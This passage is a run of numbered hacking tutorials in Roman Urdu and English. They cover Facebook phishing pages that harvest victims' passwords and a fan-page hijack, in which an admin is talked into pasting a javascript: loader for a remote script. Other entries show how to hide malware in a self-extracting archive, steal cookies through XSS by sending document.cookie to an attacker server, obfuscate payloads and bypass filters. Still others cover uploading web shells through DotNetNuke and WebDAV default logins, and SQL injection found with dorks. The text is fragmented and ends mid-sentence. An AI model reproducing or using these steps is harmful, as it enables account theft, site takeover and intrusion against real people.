. Ab atey hai is fake page ki construction ki taraf..Constructi0n:Facebook Fake page d0wnload kro g00gle se.. Easily mil jaye ga.. Phr is fake page ko upload kro.. Ab questi0n ye h0ta ha k upload kahan kren?Answ3r:Kisi b free webhosting site 4xample 000a.biz110mb.comIN MEin acnt bnao.. Aur ftp server mein jao..Wahan par index name ki file h0 gi..c NextH-117P3Us index file ko replace kro apne fake page se.L0 gi apka fake page h0 gya tyarN0w questi0n Arise kAb Isko use kaise krna ha.??H-118P4!H0w 2 use Fb Fake Page!JB ap free h0sting mein apni site bnao ge..To jo site link ho ga wo apne victim ko send krna ha.. Agar wo fake page se waqif na hua to wo us mein l0gin kre ga aur uska id and pass ap k pass aa jaye ga..Victim: Jis ka acount hack krna ha..N0w questi0n arise k hamein wo pass and i.d kahan se mile ga!C next..!H-119P5! Fr0m where u will get the victims paswrd and id??ANSWER:Jahan per ap fb fake page rakho ge agar victim ne l0gin kia ho to wahan par pass.txt k name se file buni ho gi.. Usmein victim ka id and paswrd ho ga........THE END......H-120P2!Fb ki acount hacking thr0ugh fake page h0 skti ha..!Introducti0n:Is fake page k zarye hum fb ka acount hack kr skte.. Ye same 2 same facebook l0gin jaisa page h0ga.. Aur kisi ko shak b ni ho ga..C Next.....H-121P1How 2 hack fb fanpage 1st of all download fb exploit 4rm tinyurl.com/5vp9lnothen edit it get notepad++ u cn d.l it 4rm notepad-plus-plus.org/downloadopen the file name pagehack.js with notepad++ n find wamiqali@hungry-hackers.com by ctrl+f and replace it with ur own email id which hvH-122PG2 Fb account nw u hv 2 change the viral text which will be send 2 the friends of victum 2 do this find the text hey see what i got! and replace itwith ur own text. this text will sent 2 the fb wall of15 friends of victum it is autoposting bot to prevent fb from blockingH-123PG3 now u have to upload this script to your server 4 this make ur account on 0fess.net nw after uploading ur script ur site will become ursite.0fess.net/booster.js nw u need 2 convince the admin of that fane page to put following code javascript:(a = (b = document).createElement("script")).scr="//www.ursite.0fess.net/booster.js", b.body.appendChild(a);void(0)note replace ur web link in above javascript.EndH-124How 2 make file undetectable using winrar: we will bind 2 files using rar highlight both files n then go 2 add to achive change the name and select "create sfx options" go2 advanced at the top and click on sfx options in the general tab type the name of file u want 2 run after extraction go2 modes tab and select hide all go2 the text and icon tab and change the icone click ok on theadvanced windows and ok in main window n enjoyH-125P1Xss kay script hoty ha bus wo url ma web gay agylagty jaho or dnn ma ek url or ek java script use hota ha bus.H-126P2What is Cross Site Scripting (XSS)?Cross Site Scripting allows you to insert a malicous code into a web application. (almost with a javascript code, but it is also possible to insert other codes like PHP or HTML.It is a vulnerability which is on almost every website you can find on the WWW.In addition I will talk about 2 different ways to useXSS...1. The attacker will include a code into a URL. TheXSS will not stay on the page.2. The attacker will be able to insert a code and it will stay on the website. Usually the attacker will choose a website with some "input fields", like shoutboxes, blogs and guestbooksH-127P3Finding XSS vulnerabilities1.Visit http://www.google.com2.Use"google dorks",like search.php?q=3.Found the "right" website to inject itH-128P4:The Basics of XSSA common used Cross Site Scripting injection is the following javascript code:Code:<script>alert("something")</script>If u execute it, it will popup a message box which will say "something".Soooo, if you have found a vuln website you could test if it is vuln to XSS.Just look:Code:http://database.delete.com/search.php?q=<script>alert("something")</script>That was a example for a javascript based XSS.H-129P5: But as I told you before, javascript isn't the only type of code you could use to execute a XSS.Here is a example for a HTML injection:Code:<br><br><b><u>something</u></b>Will look like:Code:http://database.delete.com/search.php?q=<br><br><b><u>something</u></b>You should see a bold text on the page, if the page is vulnerable to XSS.H-130P6Defacment with XSSTo deface a website with Cross Site Scripting (XSS) you could use the following codes:Code:<IMG SRC="http://mywebsite.com/defacmentpic.jpg">= will include a imageCode:<EMBED SRC="http://mywebsite.com/deface.swf"= will include a flash videoCode:<embed src="deface.mid" hidden autostart="true" loop="false" />= will include a music file in hidden modeCode:<script>window.open( "http://www.hackforums.net/" )</script>= will redirect you to another website, in this case"hackforums.net"H-131P7Stealing Cookies using XSSThe most used method of XSS is the cookie stealing.First get a cookielogger.php (will attach it!)Okay, now we have the cookielogger.php. Upload it to your server and also create a log.txt where your logs will be stored.Make sure that it works!H-132P8:Search a vuln website and insert following code:(replace it with your information)Code:document.location = "http://myserver.com/cookielogger.php?c="+document.cookieNow, if the user visit the website his cookies will be stolen and sent to your cookielogger.Analyze the logger for his cookies and hijack his session.H-133P9:But what is if the website hasn't a such store function?See...Code:http://website.com/search.php?q=document.location = "http://myserver.com/cookielogger.php?c="+document.cookieH-134P10:You will redirect the original website to your server.(you should "crypt" the URL string, because your victim could notice the malicious code included to the original URL)But how "crypt" this code to become "normal", so that your victim don't notice the redirect to your server?Easy...all you need is a String to ASCII Converter and the function char()( http://www.easycalculation.com/ascii-hex.php )H-135P11:Okay, now pick your javascript code and convert it to ASCII.Example:Code:<script>alert("Example")</script>is equalCode:60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62H-136P12Now,your browser only could read the code if there is a comma between the digits.Like this:Code:60,115,99,114,105, ?<...?>Finished! You crypted your malicious code to a"hidden" malicious code :D!Bypassing FiltersH-137P13:But what we could do, if a webadmin has blocked some characters?Hm, we need to find another method...just write the code in a different way.Code:<script>alert("Example")</script>would beCode:')alert("Example");Code:')alert('Example');Code:")alert("Example");?<...?> continue that to find a way :)Yeah,that is it.# Finish #H-138P1:Abbreviations(IIS) Internet Information Services(PHP) PHP Hypertext Preprocessor(DNN) DotNetNukekuch zorar abbrevitiati0n jo lacture mea use h0ty hnmalik_saab:H-139P2:Dnn dotnetnuke ek web application ha. Jst like j00mla,w0rdpress,vbulletin... But ye sirf iis par h0st ki jati haH-140P3:How to install DotNetNuke 4.5 to Windows XP Pro with IIS Video tutorial, how to install DotNetNuke 4.5 to a bare bones installation of Windows XPProfessional. www.dnncreative.com/H-141P4How to Hack a site by Dnn?Sub se pehle karna ye hai k google mein ye dork search karen:inurl:"/portals/0" site:.comH-142P5Phir jo sites hongi wo esi hongi:www.bo0m.com/portals/0/Isko kholen.H-143P6Us site k url mein portals/0 ki jaga ye likhen:providers/htmleditorproviders/fck/fcklinkgallery.aspxPhir site esi hogi www.bo0m.com/providers/htmleditorproviders/fck/fcklinkgallery.aspxH-144P7Phir agar aap k paas box bana ata hai us mein likha hoga:"Files on your site"Uspe click kren. Phir ye java code url ko mita k daalen:javascript:_dopostback('ctlurl$cmdupload',")H-145P8Us k baad upload ki option ajaega. Phir upload karden apna shell ya deface. Is mein html upload nahi ho sakti. Jpg hoti hai only.EndH-146P1:Dork link hotae hain special web k.Tm koi b dork google mai dalo phr buhat web i ge.Koi b select karo aur url k akr mai number k bd ' dal.Agar mysql not respond jaisa eror iya tou web hack ho sakti hy.Then colum n0 pta kar colum 1-- lik kar.Phr union maloom kar.2 step aur hain phr webhack.Pouch le apne hacker se.Yae msg 4wd kar k.H-147P2Dorks for webdav: ,,"inurl:.com/webdav/"Isi tarah agr India ki chahiye ho to:inurl:.in/webdav/Ye dorks Google me search krnH-148P3Us k baad site aisi hogi:www.site.com/webdav/hjApne krna ye hai k is site ko copy karen:www.site.com/webdav/Aur my computer kholenH-149P4Aapse username or pass maangega. Default username wampp and pass xampp hai. Ye daal k ok karen or us site ka name h4cked rakhden and finish pe click karen. Phir agar deface page dalna ha to u.h.html ko copy kr k us folder me paste krenH-150P5Agar shell daalna ho to shell.php ko copy kr k us folder me paste krden. Agar apna deface page dekhna ho towww.site.com/webdav/u.h.htmlAur agar apna shell kholna ho towww.site.com/webdav/shell.php----Finish---H-151 Salam frndz. I m going to share rfi web access met
Thnx